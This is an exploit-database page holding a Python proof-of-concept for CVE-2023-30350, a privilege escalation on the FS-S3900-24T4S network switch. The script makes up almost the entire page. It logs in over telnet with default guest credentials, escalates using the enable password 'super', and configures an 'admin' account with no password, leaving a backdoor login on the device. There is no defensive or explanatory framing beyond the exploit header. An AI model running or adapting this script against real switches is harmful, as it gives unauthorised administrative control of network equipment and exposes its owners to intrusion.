Share
## https://sploitus.com/exploit?id=PACKETSTORM:172124
# Exploit Title: FS-S3900-24T4S Privilege Escalation  
# Date: 29/04/2023  
# Exploit Author: Daniele Linguaglossa & Alberto Bruscino  
# Vendor Homepage: https://www.fs.com/  
# Software Link: not available  
# Version: latest  
# Tested on: latest  
# CVE : CVE-2023-30350  
  
import sys  
import telnetlib  
  
  
def exploit(args):  
print(args)  
if len(args) != 1:  
print(f"Usage: {sys.argv[0]} <ip>")  
sys.exit(1)  
else:  
ip = args[0]  
try:  
with telnetlib.Telnet(ip, 23) as tn:  
try:  
tn.read_until(b"Username: ")  
tn.write(b"guest\r\n")  
tn.read_until(b"Password: ")  
tn.write(b"guest\r\n")  
tn.read_until(b">")  
tn.write(b"enable\r\n")  
tn.read_until(b"Password: ")  
tn.write(b"super\r\n")  
tn.read_until(b"#")  
tn.write(b"configure terminal\r\n")  
tn.read_until(b"(config)#")  
tn.write(b"username admin nopassword\r\n")  
tn.read_until(b"(config)#")  
print(  
"Exploit success, you can now login with username: admin and password: <empty>")  
tn.close()  
except KeyboardInterrupt:  
print("Exploit failed")  
tn.close()  
except ConnectionRefusedError:  
print("Connection refused")  
  
  
if __name__ == "__main__":  
exploit(sys.argv[1:])